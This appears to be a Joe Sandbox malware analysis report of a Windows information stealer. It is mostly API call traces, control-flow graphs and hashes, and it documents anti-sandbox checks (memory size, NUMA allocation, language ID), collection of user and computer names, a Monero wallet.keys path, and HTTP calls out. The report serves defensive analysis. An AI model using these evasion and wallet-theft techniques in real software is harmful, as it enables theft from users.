                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: a18e2b159ccf05fa5d15f4f16fe6b6e734c2760890e8d9cee1f577a68cf913e8
                                      • Instruction ID: 07d77126eabaad962b44e312c1112dbaae10a017a27870dd2af018f7cc9542ed
                                      • Opcode Fuzzy Hash: a18e2b159ccf05fa5d15f4f16fe6b6e734c2760890e8d9cee1f577a68cf913e8
                                      • Instruction Fuzzy Hash: CD515F78B04219FFCB14DFE4E994AAE77B9EF54704F604548E902AB280E770E961CB61
                                      Function 00126C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31660), ref: 00129BF1
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31768), ref: 00129C0A
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31588), ref: 00129C22
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31708), ref: 00129C3A
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E315A0), ref: 00129C53
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E39250), ref: 00129C6B
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E266F8), ref: 00129C83
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E26678), ref: 00129C9C
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E316D8), ref: 00129CB4
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31618), ref: 00129CCC
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31648), ref: 00129CE5
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31678), ref: 00129CFD
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E26818), ref: 00129D15
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E316F0), ref: 00129D2E
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 001111D0: ExitProcess.KERNEL32 ref: 00111211
                                        • Part of subcall function 00111160: GetSystemInfo.KERNEL32(?), ref: 0011116A
                                        • Part of subcall function 00111160: ExitProcess.KERNEL32 ref: 0011117E
                                        • Part of subcall function 00111110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0011112B
                                        • Part of subcall function 00111110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00111132
                                        • Part of subcall function 00111110: ExitProcess.KERNEL32 ref: 00111143
                                        • Part of subcall function 00111220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0011123E
                                        • Part of subcall function 00111220: __aulldiv.LIBCMT ref: 00111258
                                        • Part of subcall function 00111220: __aulldiv.LIBCMT ref: 00111266
                                        • Part of subcall function 00111220: ExitProcess.KERNEL32 ref: 00111294
                                        • Part of subcall function 00126A10: GetUserDefaultLangID.KERNEL32 ref: 00126A14
                                        • Part of subcall function 00111190: ExitProcess.KERNEL32 ref: 001111C6
                                        • Part of subcall function 001279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001111B7), ref: 00127A10
                                        • Part of subcall function 001279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00127A17
                                        • Part of subcall function 001279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00127A2F
                                        • Part of subcall function 00127A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127AA0
                                        • Part of subcall function 00127A70: RtlAllocateHeap.NTDLL(00000000), ref: 00127AA7
                                        • Part of subcall function 00127A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00127ABF
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00126D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00126D99
                                      • Sleep.KERNEL32(00001770), ref: 00126DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126DBA
                                      • ExitProcess.KERNEL32 ref: 00126DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 262150f45f7f2f81587b6418f684a2e6f37e8c915c1804c6466da2710c6797ab
                                      • Instruction ID: 93135b4146d95093e21db76d2db258b393c9be5984f02a457514639dc8d3dbbd
                                      • Opcode Fuzzy Hash: 262150f45f7f2f81587b6418f684a2e6f37e8c915c1804c6466da2710c6797ab
                                      • Instruction Fuzzy Hash: E3310C31A04228ABCB19F7F0FC57AEEB379AF24340F900928F612661D1DF706965C762
                                      Function 00111220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1436 111220-111247 call 128b40 GlobalMemoryStatusEx 1439 111273-11127a 1436->1439 1440 111249-111271 call 12dd30 * 2 1436->1440 1442 111281-111285 1439->1442 1440->1442 1444 111287 1442->1444 1445 11129a-11129d 1442->1445 1447 111292-111294 ExitProcess 1444->1447 1448 111289-111290 1444->1448 1448->1445 1448->1447
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0011123E
                                      • __aulldiv.LIBCMT ref: 00111258
                                      • __aulldiv.LIBCMT ref: 00111266
                                      • ExitProcess.KERNEL32 ref: 00111294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 67acaf4f15a6d11867f3939d241b968f69fcab1b854e94c73c11360321549c22
                                      • Instruction ID: c11a626d674cb3cb815bd8cdfbc8f37e1eb0857d0336506212b05f11ed27bc5b
                                      • Opcode Fuzzy Hash: 67acaf4f15a6d11867f3939d241b968f69fcab1b854e94c73c11360321549c22
                                      • Instruction Fuzzy Hash: 1E014BB0D44318BAEF14DFE4DC4ABAEBB78AB14705F208458E704BA1C0D77455818B59
                                      Function 00126D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1450 126d93 1451 126daa 1450->1451 1453 126d5a-126d77 call 12ade0 OpenEventA 1451->1453 1454 126dac-126dc2 call 126bc0 call 125d60 CloseHandle ExitProcess 1451->1454 1460 126d95-126da4 CloseHandle Sleep 1453->1460 1461 126d79-126d91 call 12ade0 CreateEventA 1453->1461 1460->1451 1461->1454
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00126D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00126D99
                                      • Sleep.KERNEL32(00001770), ref: 00126DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126DBA
                                      • ExitProcess.KERNEL32 ref: 00126DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 979be8a05360e8bed210ddf0c5939455942dd51b84f68533858eb421368dc7ed
                                      • Instruction ID: 78a943bd40ea49563551a627629e5e0ee592757ebc3040fe99312fca5796d2e4
                                      • Opcode Fuzzy Hash: 979be8a05360e8bed210ddf0c5939455942dd51b84f68533858eb421368dc7ed
                                      • Instruction Fuzzy Hash: 26F08230A4832DEFEB25BBE0FC4ABBD3378AF14701F500615F612A91D1CBB05910CA61
                                      Function 00114800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 0c5f85c44cfc03d94eeca8f47c598b1c9e99eba593743c5f8ab41c5f168363c9
                                      • Instruction ID: 4bc1b2ab170b7e781d29f3f67685fd71888c0c1bd0b3946c33e006f5b515a75f
                                      • Opcode Fuzzy Hash: 0c5f85c44cfc03d94eeca8f47c598b1c9e99eba593743c5f8ab41c5f168363c9
                                      • Instruction Fuzzy Hash: 1A211FB1D00209ABDF14DFA4E845ADE7B79FF45320F508625FA15A72D0EB706A09CF91
                                      Function 00125440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 001162D0: InternetOpenA.WININET(00130DFF,00000001,00000000,00000000,00000000), ref: 00116331
                                        • Part of subcall function 001162D0: StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116353
                                        • Part of subcall function 001162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00116385
                                        • Part of subcall function 001162D0: HttpOpenRequestA.WININET(00000000,GET,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 001163D5
                                        • Part of subcall function 001162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0011640F
                                        • Part of subcall function 001162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00116421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 321e12012d3eaa08d6d483c7ec729d33022c332b5849d93071d52f3777b09251
                                      • Instruction ID: 764dfb3c4ad204e3ee79459eb2889605b18cf48ad98144ef4df2a7119f4da1ae
                                      • Opcode Fuzzy Hash: 321e12012d3eaa08d6d483c7ec729d33022c332b5849d93071d52f3777b09251
                                      • Instruction Fuzzy Hash: 09111230900118ABCB18FFA4FD92AED7339AF60340FC04568F91A5B492FF30AB64CA51
                                      Function 00127A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00127ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: 73e8d32eca05306df82b2158438b6d0bc5a40b74d1dac2674a3e73c000107b09
                                      • Instruction ID: e9f8f390fb2a03cb2637169c9be9ec0c51b3577bdb5557654a2d246e79f0c637
                                      • Opcode Fuzzy Hash: 73e8d32eca05306df82b2158438b6d0bc5a40b74d1dac2674a3e73c000107b09
                                      • Instruction Fuzzy Hash: 8B0186B1908259ABC714CF98ED85BAFBBBCF704721F100619F605E72C0D7755A0087A1
                                      Function 00111110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0011112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00111132
                                      • ExitProcess.KERNEL32 ref: 00111143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 31b46cd4412b74e3f2a17f46850582db69faaea7516855198975b5fc9d8aff62
                                      • Instruction ID: e8776c582e2edaad820a97d8d19b4e64e5a9090fdaf04b49d60a205a78e7e532
                                      • Opcode Fuzzy Hash: 31b46cd4412b74e3f2a17f46850582db69faaea7516855198975b5fc9d8aff62
                                      • Instruction Fuzzy Hash: 85E08670D89308FBE7259BA09C0AB4CB66C9B04B01F100254F7087A1D0C7B425404658
                                      Function 001110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001110B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001110F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
